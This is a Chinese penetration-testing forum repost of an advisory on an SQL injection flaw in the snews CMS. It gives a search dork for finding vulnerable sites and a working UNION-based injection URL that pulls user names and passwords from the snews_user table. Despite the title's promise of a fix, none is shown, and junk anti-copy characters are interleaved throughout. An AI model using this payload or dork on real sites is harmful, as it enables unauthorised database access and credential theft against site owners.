中国网络渗透测试联盟
标题:
CMS snews SQL注射及修复
[打印本页]
作者:
admin
时间:
2013-1-23 08:55
标题:
CMS snews SQL注射及修复
标题: CMS snews SQL Injection Vulnerability
/ F% p( m& }- L
作者: By onestree
: {+ r5 h: ~& j( ?+ @
下载地址 :
http://snewscms.com/
7 K* V3 H; H. d
测试平台 : ubuntu 12.10 / win 7
; b7 v8 ]4 {- g6 H
关键词: inurl:"tanyakan pada rumput yang bergoyang"
3 B4 v/ X( u. W4 Q& g O
* \# C7 d8 [2 |( B6 |
! X9 ^7 d# z3 ^. Y* F" Q7 u
*************************************************************
/ k, M4 E4 W) j0 k4 \
( @+ S% a: F/ v* H! {
SQL poc:
7 a. F0 n% \4 [ Y+ U1 B1 f5 g6 } L
; Q" X5 ]2 ^% y. E
http://www.2cto.com
/snews/snews.php?act=shownews&id=[SQL]
8 `0 o% Y s4 P. }; K
9 G' B4 K5 `0 V
示例
2 |7 T7 t7 j: u5 k( J
, Y+ V' Z& p: L2 q2 A# x
http://localhost/snews/snews.php?act=shownews&id=-23/**/union/**/select/**/0,1,concat(user_name,char(32),user_pass),3,4,5,6/**/from/**/snews_user/**/where/**/id%20like%201/*
- b' q, x9 p7 @$ @# A6 T/ f
: A6 Y. e7 s( f. `$ `1 u
4 H- s) q; Q/ @2 V/ A
致谢:
% T$ i; q/ I( a7 a, F
3 G8 r8 V# ?& x3 i8 V
Exploit-db | Alex_Ownz | alm.teardrop | abhelink | kalong666 | prorebell
8 y& j0 b) p9 Z5 h
, y+ ]' T; J* l- j
indonesiancoder - moeslimh4x0r - go-coder
- F* H! H) ^0 s1 E
7 \6 j& f7 ~, j0 L7 U( U D
spesial my hunny :*
: W' O1 o' t1 Q0 T8 `( B: ]& }3 E
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2